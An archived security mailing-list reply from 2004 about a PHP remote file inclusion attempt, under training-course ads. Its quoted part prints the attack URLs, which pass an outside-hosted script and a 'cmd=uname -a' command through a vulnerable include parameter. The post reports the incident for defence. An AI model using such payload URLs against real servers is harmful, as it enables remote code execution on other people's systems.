Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Incidents
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: PHP injection attempt from 200.222.244.154

from [Kirby Angell] Network Security [Permanent Link]
Subject: Re: PHP injection attempt from 200.222.244.154
Date: Mon, 22 Nov 2004 20:09:22 -0600 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Haha... note to self, do not include the actual attack URL in the
message.  Judging from this referer:

Referer:
http://gmail.google.com/gmail?view=cv&search=inbox&th=10063111e32eb17b&lvp=-1&cvp=0&zx=18acabd2b173f0d8528652499


I'd say someone got my message from this list and then clicked on the
URLs  :-)

Kirby Angell wrote:
...>
| The attacker IP made 4 attempts to exploit a common coding error found
| in PHP applications. The flaw involves injecting a malicious URL into a
| variable that the given PHP page later uses in an 'include' statement.
| In all attempts, the given page was not susceptible to the attack and
| therefore a 302 Not Found error was returned.
|
| In the first attempt, the attacker tried:
|
|
http://[domain]/uptime3?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a

|
|
| The rest of the attempts the attacker tried:
|
|
http://[domain]/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a

|
...

(I edited them out this time)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBopvS21unUZAE9MARAmb0AJ9bxXgRZE7w2VLzECmwhCXr0dE2ewCeO3La
DrJM5PIDq+0NM2xN6pC6Bak=
=dj/a
-----END PGP SIGNATURE-----

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  RE: PHP injection attempt from 200.222.244.154, KEM Hosting
Next by Date:  Odd addresses on my wireless network, Michael Acosta
Previous by Thread:  RE: PHP injection attempt from 200.222.244.154, KEM Hosting
Next by Thread:  Odd addresses on my wireless network, Michael Acosta
Indexes:  [Date] [Thread] [Top] [All Lists]